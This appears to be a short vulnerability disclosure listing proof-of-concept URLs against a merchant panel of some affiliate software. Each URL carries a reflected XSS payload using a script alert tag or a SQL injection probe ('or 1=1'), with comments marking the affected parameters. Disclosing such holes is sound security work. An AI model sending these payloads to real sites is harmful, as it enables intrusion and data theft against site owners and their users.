http://www.example.com/affiliate/merchants/index.php?Act=programedit&mode=edit&id=42"><script>alert()</script>
http://www.example.com/affiliate/merchants/index.php?Act=programedit&mode=edit&id=42&msg=Program%20Edited%20Successfully"><script>alert()</script>
http://www.example.com/affiliate/merchants/index.php?Act=uploadProducts&pgmid=41%20or%201=1 // SQL injection and XSS
http://www.example.com/affiliate/merchants/index.php?Act=daily&d=9&m=07&y=2007 // all variables except Act are affected by XSS
http://www.example.com/affiliate/merchants/index.php?Act=ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date"><script>alert()</script>
http://www.example.com/affiliate/merchants/index.php?Act=LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007&programs=All // all variables except Act and sub are affected by XSS
http://www.example.com/affiliate/merchants/temp.php?rowid=5"><script>alert()</script> // possible SQL injection too
http://www.example.com/affiliate/merchants/index.php?Act=add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>&modofpay=Authorize.net&bankname=&bankno=&bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=